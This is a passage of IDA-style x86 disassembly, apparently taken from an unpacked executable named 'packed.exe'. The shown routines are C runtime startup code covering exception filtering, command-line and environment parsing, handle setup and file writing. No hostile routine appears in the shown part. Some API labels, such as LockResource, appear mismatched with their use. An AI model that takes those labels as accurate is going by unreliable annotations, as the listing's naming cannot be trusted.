lea esp, [ebp-118h]
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
call sub_41A026
pop edi
pop esi
pop ebx
leave
retn
sub_41B3F9 endp
; =============== S U B R O U T I N E =======================================
sub_41B570 proc near ; CODE XREF: sub_4160D0+9�p
; sub_4160F5+9�p
mov eax, dword_47C210
cmp eax, 1
jz short loc_41B587
test eax, eax
jnz short locret_41B5A8
cmp dword_42D7D4, 1
jnz short locret_41B5A8
loc_41B587: ; CODE XREF: sub_41B570+8�j
push 0FCh
call sub_41B3F9
mov eax, dword_47C390
test eax, eax
pop ecx
jz short loc_41B59D
call eax
loc_41B59D: ; CODE XREF: sub_41B570+29�j
push 0FFh
call sub_41B3F9
pop ecx
locret_41B5A8: ; CODE XREF: sub_41B570+C�j
; sub_41B570+15�j
retn
sub_41B570 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B5A9 proc near ; CODE XREF: .text:004162BD�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
call sub_416C45
mov edi, [ebp+arg_0]
mov esi, eax
mov edx, [esi+54h]
mov eax, dword_42E0DC
mov ecx, edx
loc_41B5C4: ; CODE XREF: sub_41B5A9+2A�j
cmp [ecx], edi
jz short loc_41B5D5
lea ebx, [eax+eax*2]
add ecx, 0Ch
lea ebx, [edx+ebx*4]
cmp ecx, ebx
jb short loc_41B5C4
loc_41B5D5: ; CODE XREF: sub_41B5A9+1D�j
lea eax, [eax+eax*2]
lea eax, [edx+eax*4]
cmp ecx, eax
jnb short loc_41B5E3
cmp [ecx], edi
jz short loc_41B5E5
loc_41B5E3: ; CODE XREF: sub_41B5A9+34�j
xor ecx, ecx
loc_41B5E5: ; CODE XREF: sub_41B5A9+38�j
test ecx, ecx
jz loc_41B6FF
mov ebx, [ecx+8]
test ebx, ebx
mov [ebp+arg_0], ebx
jz loc_41B6FF
cmp ebx, 5
jnz short loc_41B60C
and dword ptr [ecx+8], 0
xor eax, eax
inc eax
jmp loc_41B708
; ---------------------------------------------------------------------------
loc_41B60C: ; CODE XREF: sub_41B5A9+55�j
cmp ebx, 1
jz loc_41B6FA
mov eax, [esi+58h]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
mov [esi+58h], eax
mov eax, [ecx+4]
cmp eax, 8
jnz loc_41B6EC
mov edx, dword_42E0D0
mov eax, dword_42E0D4
add eax, edx
cmp edx, eax
jge short loc_41B665
lea eax, [edx+edx*2]
shl eax, 2
loc_41B644: ; CODE XREF: sub_41B5A9+B7�j
mov edi, [esi+54h]
and dword ptr [eax+edi+8], 0
mov edi, dword_42E0D0
mov ebx, dword_42E0D4
inc edx
add ebx, edi
add eax, 0Ch
cmp edx, ebx
jl short loc_41B644
mov ebx, [ebp+arg_0]
loc_41B665: ; CODE XREF: sub_41B5A9+93�j
mov ecx, [ecx]
cmp ecx, 0C000008Eh
mov edi, [esi+5Ch]
jnz short loc_41B67B
mov dword ptr [esi+5Ch], 83h
jmp short loc_41B6DF
; ---------------------------------------------------------------------------
loc_41B67B: ; CODE XREF: sub_41B5A9+C7�j
cmp ecx, 0C0000090h
jnz short loc_41B68C
mov dword ptr [esi+5Ch], 81h
jmp short loc_41B6DF
; ---------------------------------------------------------------------------
loc_41B68C: ; CODE XREF: sub_41B5A9+D8�j
cmp ecx, 0C0000091h
jnz short loc_41B69D
mov dword ptr [esi+5Ch], 84h
jmp short loc_41B6DF
; ---------------------------------------------------------------------------
loc_41B69D: ; CODE XREF: sub_41B5A9+E9�j
cmp ecx, 0C0000093h
jnz short loc_41B6AE
mov dword ptr [esi+5Ch], 85h
jmp short loc_41B6DF
; ---------------------------------------------------------------------------
loc_41B6AE: ; CODE XREF: sub_41B5A9+FA�j
cmp ecx, 0C000008Dh
jnz short loc_41B6BF
mov dword ptr [esi+5Ch], 82h
jmp short loc_41B6DF
; ---------------------------------------------------------------------------
loc_41B6BF: ; CODE XREF: sub_41B5A9+10B�j
cmp ecx, 0C000008Fh
jnz short loc_41B6D0
mov dword ptr [esi+5Ch], 86h
jmp short loc_41B6DF
; ---------------------------------------------------------------------------
loc_41B6D0: ; CODE XREF: sub_41B5A9+11C�j
cmp ecx, 0C0000092h
jnz short loc_41B6DF
mov dword ptr [esi+5Ch], 8Ah
loc_41B6DF: ; CODE XREF: sub_41B5A9+D0�j
; sub_41B5A9+E1�j ...
push dword ptr [esi+5Ch]
push 8
call ebx
pop ecx
mov [esi+5Ch], edi
jmp short loc_41B6F3
; ---------------------------------------------------------------------------
loc_41B6EC: ; CODE XREF: sub_41B5A9+7E�j
and dword ptr [ecx+8], 0
push eax
call ebx
loc_41B6F3: ; CODE XREF: sub_41B5A9+141�j
mov eax, [ebp+var_4]
pop ecx
mov [esi+58h], eax
loc_41B6FA: ; CODE XREF: sub_41B5A9+66�j
or eax, 0FFFFFFFFh
jmp short loc_41B708
; ---------------------------------------------------------------------------
loc_41B6FF: ; CODE XREF: sub_41B5A9+3E�j
; sub_41B5A9+4C�j
push [ebp+arg_4]
call ds:dword_4201B8 ; UnhandledExceptionFilter
loc_41B708: ; CODE XREF: sub_41B5A9+5E�j
; sub_41B5A9+154�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B5A9 endp
; =============== S U B R O U T I N E =======================================
sub_41B70D proc near ; CODE XREF: .text:00416275�p
cmp dword_47D9D4, 0
jnz short loc_41B71B
call sub_41AF4D
loc_41B71B: ; CODE XREF: sub_41B70D+7�j
push esi
mov esi, dword_47D9C4
test esi, esi
jnz short loc_41B72D
mov esi, 420AEAh
jmp short loc_41B772
; ---------------------------------------------------------------------------
loc_41B72D: ; CODE XREF: sub_41B70D+17�j
mov al, [esi]
cmp al, 22h
jnz short loc_41B75B
inc esi
mov al, [esi]
cmp al, 22h
jz short loc_41B76B
loc_41B73A: ; CODE XREF: sub_41B70D+45�j
test al, al
jz short loc_41B754
movzx eax, al
push eax
call sub_41E3AD
test eax, eax
pop ecx
jz short loc_41B74D
inc esi
loc_41B74D: ; CODE XREF: sub_41B70D+3D�j
inc esi
mov al, [esi]
cmp al, 22h
jnz short loc_41B73A
loc_41B754: ; CODE XREF: sub_41B70D+2F�j
cmp byte ptr [esi], 22h
jnz short loc_41B76C
jmp short loc_41B76B
; ---------------------------------------------------------------------------
loc_41B75B: ; CODE XREF: sub_41B70D+24�j
cmp al, 20h
jbe short loc_41B76C
loc_41B75F: ; CODE XREF: sub_41B70D+56�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_41B75F
jmp short loc_41B76C
; ---------------------------------------------------------------------------
loc_41B767: ; CODE XREF: sub_41B70D+63�j
cmp al, 20h
ja short loc_41B772
loc_41B76B: ; CODE XREF: sub_41B70D+2B�j
; sub_41B70D+4C�j
inc esi
loc_41B76C: ; CODE XREF: sub_41B70D+4A�j
; sub_41B70D+50�j ...
mov al, [esi]
test al, al
jnz short loc_41B767
loc_41B772: ; CODE XREF: sub_41B70D+1E�j
; sub_41B70D+5C�j
mov eax, esi
pop esi
retn
sub_41B70D endp
; =============== S U B R O U T I N E =======================================
sub_41B776 proc near ; CODE XREF: .text:loc_416244�p
push ebx
xor ebx, ebx
cmp dword_47D9D4, ebx
push esi
push edi
jnz short loc_41B788
call sub_41AF4D
loc_41B788: ; CODE XREF: sub_41B776+B�j
mov esi, dword_47C208
xor edi, edi
cmp esi, ebx
jnz short loc_41B7A6
jmp short loc_41B7C6
; ---------------------------------------------------------------------------
loc_41B796: ; CODE XREF: sub_41B776+34�j
cmp al, 3Dh
jz short loc_41B79B
inc edi
loc_41B79B: ; CODE XREF: sub_41B776+22�j
push esi
call sub_4177F0
pop ecx
lea esi, [esi+eax+1]
loc_41B7A6: ; CODE XREF: sub_41B776+1C�j
mov al, [esi]
cmp al, bl
jnz short loc_41B796
lea eax, ds:4[edi*4]
push eax
call sub_414CAD
mov edi, eax
cmp edi, ebx
pop ecx
mov dword_47C1E4, edi
jnz short loc_41B7CB
loc_41B7C6: ; CODE XREF: sub_41B776+1E�j
or eax, 0FFFFFFFFh
jmp short loc_41B823
; ---------------------------------------------------------------------------
loc_41B7CB: ; CODE XREF: sub_41B776+4E�j
mov esi, dword_47C208
push ebp
jmp short loc_41B7FE
; ---------------------------------------------------------------------------
loc_41B7D4: ; CODE XREF: sub_41B776+8A�j
push esi
call sub_4177F0
mov ebp, eax
inc ebp
cmp byte ptr [esi], 3Dh
pop ecx
jz short loc_41B7FC
push ebp
call sub_414CAD
cmp eax, ebx
pop ecx
mov [edi], eax
jz short loc_41B827
push esi
push eax
call sub_419A70
pop ecx
pop ecx
add edi, 4
loc_41B7FC: ; CODE XREF: sub_41B776+6B�j
add esi, ebp
loc_41B7FE: ; CODE XREF: sub_41B776+5C�j
cmp [esi], bl
jnz short loc_41B7D4
push dword_47C208
call sub_414844
mov dword_47C208, ebx
mov [edi], ebx
mov dword_47D9C8, 1
xor eax, eax
loc_41B821: ; CODE XREF: sub_41B776+C5�j
pop ecx
pop ebp
loc_41B823: ; CODE XREF: sub_41B776+53�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41B827: ; CODE XREF: sub_41B776+78�j
push dword_47C1E4
call sub_414844
mov dword_47C1E4, ebx
or eax, 0FFFFFFFFh
jmp short loc_41B821
sub_41B776 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B83D proc near ; CODE XREF: sub_41B9A9+54�p
; sub_41B9A9+85�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_0], edx
push edi
mov [esi], edx
mov edi, ecx
mov dword ptr [ebx], 1
jz short loc_41B860
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_41B860: ; CODE XREF: sub_41B83D+18�j
; sub_41B83D+65�j ...
cmp byte ptr [eax], 22h
jnz short loc_41B873
xor ecx, ecx
test edx, edx
setz cl
inc eax
mov edx, ecx
mov cl, 22h
jmp short loc_41B8A0
; ---------------------------------------------------------------------------
loc_41B873: ; CODE XREF: sub_41B83D+26�j
inc dword ptr [esi]
test edi, edi
jz short loc_41B87E
mov cl, [eax]
mov [edi], cl
inc edi
loc_41B87E: ; CODE XREF: sub_41B83D+3A�j
mov cl, [eax]
movzx ebx, cl
inc eax
test byte_47C761[ebx], 4
jz short loc_41B899
inc dword ptr [esi]
test edi, edi
jz short loc_41B898
mov bl, [eax]
mov [edi], bl
inc edi
loc_41B898: ; CODE XREF: sub_41B83D+54�j
inc eax
loc_41B899: ; CODE XREF: sub_41B83D+4E�j
test cl, cl
mov ebx, [ebp+arg_4]
jz short loc_41B8D2
loc_41B8A0: ; CODE XREF: sub_41B83D+34�j
test edx, edx
jnz short loc_41B860
cmp cl, 20h
jz short loc_41B8AE
cmp cl, 9
jnz short loc_41B860
loc_41B8AE: ; CODE XREF: sub_41B83D+6A�j
test edi, edi
jz short loc_41B8B6
and byte ptr [edi-1], 0
loc_41B8B6: ; CODE XREF: sub_41B83D+73�j
; sub_41B83D+96�j
and [ebp+var_4], 0
loc_41B8BA: ; CODE XREF: sub_41B83D+157�j
cmp byte ptr [eax], 0
jz loc_41B999
loc_41B8C3: ; CODE XREF: sub_41B83D+93�j
mov cl, [eax]
cmp cl, 20h
jz short loc_41B8CF
cmp cl, 9
jnz short loc_41B8D5
loc_41B8CF: ; CODE XREF: sub_41B83D+8B�j
inc eax
jmp short loc_41B8C3
; ---------------------------------------------------------------------------
loc_41B8D2: ; CODE XREF: sub_41B83D+61�j
dec eax
jmp short loc_41B8B6
; ---------------------------------------------------------------------------
loc_41B8D5: ; CODE XREF: sub_41B83D+90�j
cmp byte ptr [eax], 0
jz loc_41B999
cmp [ebp+arg_0], 0
jz short loc_41B8ED
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_41B8ED: ; CODE XREF: sub_41B83D+A5�j
inc dword ptr [ebx]
loc_41B8EF: ; CODE XREF: sub_41B83D+145�j
xor ebx, ebx
inc ebx
xor edx, edx
jmp short loc_41B8F8
; ---------------------------------------------------------------------------
loc_41B8F6: ; CODE XREF: sub_41B83D+BE�j
inc eax
inc edx
loc_41B8F8: ; CODE XREF: sub_41B83D+B7�j
cmp byte ptr [eax], 5Ch
jz short loc_41B8F6
cmp byte ptr [eax], 22h
jnz short loc_41B928
test dl, 1
jnz short loc_41B926
cmp [ebp+var_4], 0
jz short loc_41B919
lea ecx, [eax+1]
cmp byte ptr [ecx], 22h
jnz short loc_41B919
mov eax, ecx
jmp short loc_41B91B
; ---------------------------------------------------------------------------
loc_41B919: ; CODE XREF: sub_41B83D+CE�j
; sub_41B83D+D6�j
xor ebx, ebx
loc_41B91B: ; CODE XREF: sub_41B83D+DA�j
xor ecx, ecx
cmp [ebp+var_4], ecx
setz cl
mov [ebp+var_4], ecx
loc_41B926: ; CODE XREF: sub_41B83D+C8�j
shr edx, 1
loc_41B928: ; CODE XREF: sub_41B83D+C3�j
test edx, edx
jz short loc_41B939
loc_41B92C: ; CODE XREF: sub_41B83D+FA�j
test edi, edi
jz short loc_41B934
mov byte ptr [edi], 5Ch
inc edi
loc_41B934: ; CODE XREF: sub_41B83D+F1�j
inc dword ptr [esi]
dec edx
jnz short loc_41B92C
loc_41B939: ; CODE XREF: sub_41B83D+ED�j
mov cl, [eax]
test cl, cl
jz short loc_41B987
cmp [ebp+var_4], 0
jnz short loc_41B94F
cmp cl, 20h
jz short loc_41B987
cmp cl, 9
jz short loc_41B987
loc_41B94F: ; CODE XREF: sub_41B83D+106�j
test ebx, ebx
jz short loc_41B981
test edi, edi
jz short loc_41B970
movzx edx, cl
test byte_47C761[edx], 4
jz short loc_41B969
mov [edi], cl
inc edi
inc eax
inc dword ptr [esi]
loc_41B969: ; CODE XREF: sub_41B83D+124�j
mov cl, [eax]
mov [edi], cl
inc edi
jmp short loc_41B97F
; ---------------------------------------------------------------------------
loc_41B970: ; CODE XREF: sub_41B83D+118�j
movzx ecx, cl
test byte_47C761[ecx], 4
jz short loc_41B97F
inc eax
inc dword ptr [esi]
loc_41B97F: ; CODE XREF: sub_41B83D+131�j
; sub_41B83D+13D�j
inc dword ptr [esi]
loc_41B981: ; CODE XREF: sub_41B83D+114�j
inc eax
jmp loc_41B8EF
; ---------------------------------------------------------------------------
loc_41B987: ; CODE XREF: sub_41B83D+100�j
; sub_41B83D+10B�j ...
test edi, edi
jz short loc_41B98F
and byte ptr [edi], 0
inc edi
loc_41B98F: ; CODE XREF: sub_41B83D+14C�j
inc dword ptr [esi]
mov ebx, [ebp+arg_4]
jmp loc_41B8BA
; ---------------------------------------------------------------------------
loc_41B999: ; CODE XREF: sub_41B83D+80�j
; sub_41B83D+9B�j
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_41B9A3
and dword ptr [eax], 0
loc_41B9A3: ; CODE XREF: sub_41B83D+161�j
inc dword ptr [ebx]
pop edi
pop ebx
leave
retn
sub_41B83D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B9A9 proc near ; CODE XREF: .text:00416233�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp dword_47D9D4, edi
jnz short loc_41B9C0
call sub_41AF4D
loc_41B9C0: ; CODE XREF: sub_41B9A9+10�j
and byte_47C49C, 0
push 104h
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push esi
push edi
call ds:dword_420010 ; GetModuleFileNameA
mov eax, dword_47D9C4
cmp eax, edi
mov off_47C1F4, esi
jz short loc_41B9EF
cmp byte ptr [eax], 0
mov ebx, eax
jnz short loc_41B9F1
loc_41B9EF: ; CODE XREF: sub_41B9A9+3D�j
mov ebx, esi
loc_41B9F1: ; CODE XREF: sub_41B9A9+44�j
lea eax, [ebp+var_4]
push eax
push edi
lea esi, [ebp+var_8]
xor ecx, ecx
mov eax, ebx
call sub_41B83D
mov esi, [ebp+var_4]
mov eax, [ebp+var_8]
shl esi, 2
add eax, esi
push eax
call sub_414CAD
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_41BA21
or eax, 0FFFFFFFFh
jmp short loc_41BA46
; ---------------------------------------------------------------------------
loc_41BA21: ; CODE XREF: sub_41B9A9+71�j
lea eax, [ebp+var_4]
push eax
lea ecx, [esi+edi]
push edi
lea esi, [ebp+var_8]
mov eax, ebx
call sub_41B83D
mov eax, [ebp+var_4]
dec eax
pop ecx
mov dword_47C1D8, eax
pop ecx
mov dword_47C1DC, edi
xor eax, eax
loc_41BA46: ; CODE XREF: sub_41B9A9+76�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B9A9 endp
; =============== S U B R O U T I N E =======================================
sub_41BA4B proc near ; CODE XREF: .text:00416229�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_47C4A0
push ebx
push ebp
push esi
push edi
mov edi, ds:dword_4201C8
xor ebx, ebx
xor esi, esi
cmp eax, ebx
push 2
pop ebp
jnz short loc_41BA94
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_41BA7B
mov dword_47C4A0, 1
jmp short loc_41BA99
; ---------------------------------------------------------------------------
loc_41BA7B: ; CODE XREF: sub_41BA4B+22�j
call ds:dword_420008 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_41BA8F
mov eax, ebp
mov dword_47C4A0, eax
jmp short loc_41BA94
; ---------------------------------------------------------------------------
loc_41BA8F: ; CODE XREF: sub_41BA4B+39�j
mov eax, dword_47C4A0
loc_41BA94: ; CODE XREF: sub_41BA4B+1A�j
; sub_41BA4B+42�j
cmp eax, 1
jnz short loc_41BB16
loc_41BA99: ; CODE XREF: sub_41BA4B+2E�j
cmp esi, ebx
jnz short loc_41BAA5
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_41BB1E
loc_41BAA5: ; CODE XREF: sub_41BA4B+50�j
cmp [esi], bx
mov eax, esi
jz short loc_41BABA
loc_41BAAC: ; CODE XREF: sub_41BA4B+66�j
; sub_41BA4B+6D�j
add eax, ebp
cmp [eax], bx
jnz short loc_41BAAC
add eax, ebp
cmp [eax], bx
jnz short loc_41BAAC
loc_41BABA: ; CODE XREF: sub_41BA4B+5F�j
mov edi, ds:dword_4200D8
push ebx
push ebx
push ebx
sub eax, esi
push ebx
sar eax, 1
inc eax
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_41BB0B
push ebp
call sub_414CAD
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_41BB0B
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_41BB07
push [esp+18h+var_8]
call sub_414844
pop ecx
mov [esp+18h+var_8], ebx
loc_41BB07: ; CODE XREF: sub_41BA4B+AC�j
mov ebx, [esp+18h+var_8]
loc_41BB0B: ; CODE XREF: sub_41BA4B+8C�j
; sub_41BA4B+9B�j
push esi
call ds:dword_4201C4 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_41BB66
; ---------------------------------------------------------------------------
loc_41BB16: ; CODE XREF: sub_41BA4B+4C�j
cmp eax, ebp
jz short loc_41BB22
cmp eax, ebx
jz short loc_41BB22
loc_41BB1E: ; CODE XREF: sub_41BA4B+58�j
; sub_41BA4B+E1�j
xor eax, eax
jmp short loc_41BB66
; ---------------------------------------------------------------------------
loc_41BB22: ; CODE XREF: sub_41BA4B+CD�j
; sub_41BA4B+D1�j
call ds:dword_4201C0 ; GetEnvironmentStrings
mov esi, eax
cmp esi, ebx
jz short loc_41BB1E
cmp [esi], bl
jz short loc_41BB3C
loc_41BB32: ; CODE XREF: sub_41BA4B+EA�j
; sub_41BA4B+EF�j
inc eax
cmp [eax], bl
jnz short loc_41BB32
inc eax
cmp [eax], bl
jnz short loc_41BB32
loc_41BB3C: ; CODE XREF: sub_41BA4B+E5�j
sub eax, esi
inc eax
mov ebp, eax
push ebp
call sub_414CAD
mov edi, eax
cmp edi, ebx
pop ecx
jnz short loc_41BB52
xor edi, edi
jmp short loc_41BB5D
; ---------------------------------------------------------------------------
loc_41BB52: ; CODE XREF: sub_41BA4B+101�j
push ebp
push esi
push edi
call sub_418F70
add esp, 0Ch
loc_41BB5D: ; CODE XREF: sub_41BA4B+105�j
push esi
call ds:dword_4201BC ; FreeEnvironmentStringsA
mov eax, edi
loc_41BB66: ; CODE XREF: sub_41BA4B+C9�j
; sub_41BA4B+D5�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_41BA4B endp
; =============== S U B R O U T I N E =======================================
sub_41BB6D proc near ; CODE XREF: .text:0041620D�p
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 48h
push ebx
mov ebx, 480h
push ebx
call sub_414CAD
test eax, eax
pop ecx
jnz short loc_41BB89
or eax, 0FFFFFFFFh
jmp loc_41BD66
; ---------------------------------------------------------------------------
loc_41BB89: ; CODE XREF: sub_41BB6D+12�j
mov dword_47C640, eax
mov dword_47C638, 20h
lea ecx, [eax+480h]
jmp short loc_41BBBE
; ---------------------------------------------------------------------------
loc_41BBA0: ; CODE XREF: sub_41BB6D+53�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov ecx, dword_47C640
add eax, 24h
add ecx, 480h
loc_41BBBE: ; CODE XREF: sub_41BB6D+31�j
cmp eax, ecx
jb short loc_41BBA0
push ebp
push esi
push edi
lea eax, [esp+58h+var_44]
push eax
call ds:dword_420164 ; GetStartupInfoA
cmp word ptr [esp+58h+var_14+2], 0
jz loc_41BCC5
mov eax, [esp+58h+var_10]
test eax, eax
jz loc_41BCC5
mov edi, [eax]
lea ebp, [eax+4]
lea eax, [edi+ebp]
mov [esp+58h+var_48], eax
mov eax, 800h
cmp edi, eax
jl short loc_41BBFF
mov edi, eax
loc_41BBFF: ; CODE XREF: sub_41BB6D+8E�j
cmp dword_47C638, edi
jge short loc_41BC55
mov esi, offset dword_47C644
loc_41BC0C: ; CODE XREF: sub_41BB6D+DE�j
push ebx
call sub_414CAD
test eax, eax
pop ecx
jz short loc_41BC4F
add dword_47C638, 20h
mov [esi], eax
lea ecx, [eax+480h]
jmp short loc_41BC3E
; ---------------------------------------------------------------------------
loc_41BC28: ; CODE XREF: sub_41BB6D+D3�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov ecx, [esi]
add eax, 24h
add ecx, ebx
loc_41BC3E: ; CODE XREF: sub_41BB6D+B9�j
cmp eax, ecx
jb short loc_41BC28
add esi, 4
cmp dword_47C638, edi
jl short loc_41BC0C
jmp short loc_41BC55
; ---------------------------------------------------------------------------
loc_41BC4F: ; CODE XREF: sub_41BB6D+A8�j
mov edi, dword_47C638
loc_41BC55: ; CODE XREF: sub_41BB6D+98�j
; sub_41BB6D+E0�j
xor ebx, ebx
test edi, edi
jle short loc_41BCC5
loc_41BC5B: ; CODE XREF: sub_41BB6D+156�j
mov eax, [esp+58h+var_48]
mov eax, [eax]
cmp eax, 0FFFFFFFFh
jz short loc_41BCBA
mov cl, [ebp+0]
test cl, 1
jz short loc_41BCBA
test cl, 8
jnz short loc_41BC7E
push eax
call ds:dword_4201D0 ; GetFileType
test eax, eax
jz short loc_41BCBA
loc_41BC7E: ; CODE XREF: sub_41BB6D+104�j
mov ecx, ebx
mov eax, ebx
and eax, 1Fh
lea eax, [eax+eax*8]
sar ecx, 5
mov ecx, dword_47C640[ecx*4]
lea esi, [ecx+eax*4]
mov eax, [esp+58h+var_48]
mov eax, [eax]
mov [esi], eax
mov al, [ebp+0]
mov [esi+4], al
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41CFB8
test eax, eax
pop ecx
pop ecx
jz short loc_41BCE5
inc dword ptr [esi+8]
loc_41BCBA: ; CODE XREF: sub_41BB6D+F7�j
; sub_41BB6D+FF�j ...
add [esp+58h+var_48], 4
inc ebx
inc ebp
cmp ebx, edi
jl short loc_41BC5B
loc_41BCC5: ; CODE XREF: sub_41BB6D+69�j
; sub_41BB6D+75�j ...
xor ebx, ebx
loc_41BCC7: ; CODE XREF: sub_41BB6D+1E2�j
mov ecx, dword_47C640
lea eax, [ebx+ebx*8]
lea esi, [ecx+eax*4]
cmp dword ptr [esi], 0FFFFFFFFh
jnz short loc_41BD47
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_41BCEA
push 0FFFFFFF6h
pop eax
jmp short loc_41BCF4
; ---------------------------------------------------------------------------
loc_41BCE5: ; CODE XREF: sub_41BB6D+148�j
; sub_41BB6D+1CD�j
or eax, 0FFFFFFFFh
jmp short loc_41BD63
; ---------------------------------------------------------------------------
loc_41BCEA: ; CODE XREF: sub_41BB6D+171�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_41BCF4: ; CODE XREF: sub_41BB6D+176�j
push eax
call ds:dword_4201B4 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41BD41
push edi
call ds:dword_4201D0 ; GetFileType
test eax, eax
jz short loc_41BD41
and eax, 0FFh
cmp eax, 2
mov [esi], edi
jnz short loc_41BD1F
or byte ptr [esi+4], 40h
jmp short loc_41BD28
; ---------------------------------------------------------------------------
loc_41BD1F: ; CODE XREF: sub_41BB6D+1AA�j
cmp eax, 3
jnz short loc_41BD28
or byte ptr [esi+4], 8
loc_41BD28: ; CODE XREF: sub_41BB6D+1B0�j
; sub_41BB6D+1B5�j
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41CFB8
test eax, eax
pop ecx
pop ecx
jz short loc_41BCE5
inc dword ptr [esi+8]
jmp short loc_41BD4B
; ---------------------------------------------------------------------------
loc_41BD41: ; CODE XREF: sub_41BB6D+193�j
; sub_41BB6D+19E�j
or byte ptr [esi+4], 40h
jmp short loc_41BD4B
; ---------------------------------------------------------------------------
loc_41BD47: ; CODE XREF: sub_41BB6D+169�j
or byte ptr [esi+4], 80h
loc_41BD4B: ; CODE XREF: sub_41BB6D+1D2�j
; sub_41BB6D+1D8�j
inc ebx
cmp ebx, 3
jl loc_41BCC7
push dword_47C638
call ds:dword_4201CC ; LockResource
xor eax, eax
loc_41BD63: ; CODE XREF: sub_41BB6D+17B�j
pop edi
pop esi
pop ebp
loc_41BD66: ; CODE XREF: sub_41BB6D+17�j
pop ebx
add esp, 48h
retn
sub_41BB6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BD6B proc near ; CODE XREF: sub_41BF10+52�p
; sub_41E49E+91�p
var_420 = byte ptr -420h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 420h
mov eax, dword_42DEB8
xor eax, [ebp+4]
push edi
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+var_14], edi
mov [ebp+var_18], edi
jnz short loc_41BD94
xor eax, eax
jmp loc_41BF02
; ---------------------------------------------------------------------------
loc_41BD94: ; CODE XREF: sub_41BD6B+20�j
mov eax, [ebp+arg_0]
push ebx
mov ebx, [ebp+arg_0]
and eax, 1Fh
sar ebx, 5
push esi
lea esi, [eax+eax*8]
lea ebx, ds:47C640h[ebx*4]
mov eax, [ebx]
shl esi, 2
test byte ptr [eax+esi+4], 20h
jz short loc_41BDC7
push 2
push edi
push edi
push [ebp+arg_0]
call sub_41E3BE
add esp, 10h
loc_41BDC7: ; CODE XREF: sub_41BD6B+4B�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_41BE99
cmp [ebp+arg_8], edi
mov eax, [ebp+arg_4]
mov [ebp+var_10], eax
mov [ebp+var_8], edi
jbe loc_41BED4
loc_41BDE7: ; CODE XREF: sub_41BD6B+F3�j
mov ecx, [ebp+var_10]
sub ecx, [ebp+arg_4]
lea eax, [ebp+var_420]
mov [ebp+var_C], edi
loc_41BDF6: ; CODE XREF: sub_41BD6B+B5�j
cmp ecx, [ebp+arg_8]
jnb short loc_41BE22
mov edx, [ebp+var_10]
inc [ebp+var_10]
mov dl, [edx]
inc ecx
cmp dl, 0Ah
jnz short loc_41BE13
inc [ebp+var_18]
mov byte ptr [eax], 0Dh
inc eax
inc [ebp+var_C]
loc_41BE13: ; CODE XREF: sub_41BD6B+9C�j
mov [eax], dl
inc eax
inc [ebp+var_C]
cmp [ebp+var_C], 400h
jl short loc_41BDF6
loc_41BE22: ; CODE XREF: sub_41BD6B+8E�j
mov edi, eax
lea eax, [ebp+var_420]
sub edi, eax
push 0
lea eax, [ebp+var_1C]
push eax
push edi
lea eax, [ebp+var_420]
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call ds:dword_420040 ; WriteFile
test eax, eax
jz short loc_41BE62
mov eax, [ebp+var_1C]
add [ebp+var_14], eax
cmp eax, edi
jl short loc_41BE6B
mov eax, [ebp+var_10]
sub eax, [ebp+arg_4]
xor edi, edi
cmp eax, [ebp+arg_8]
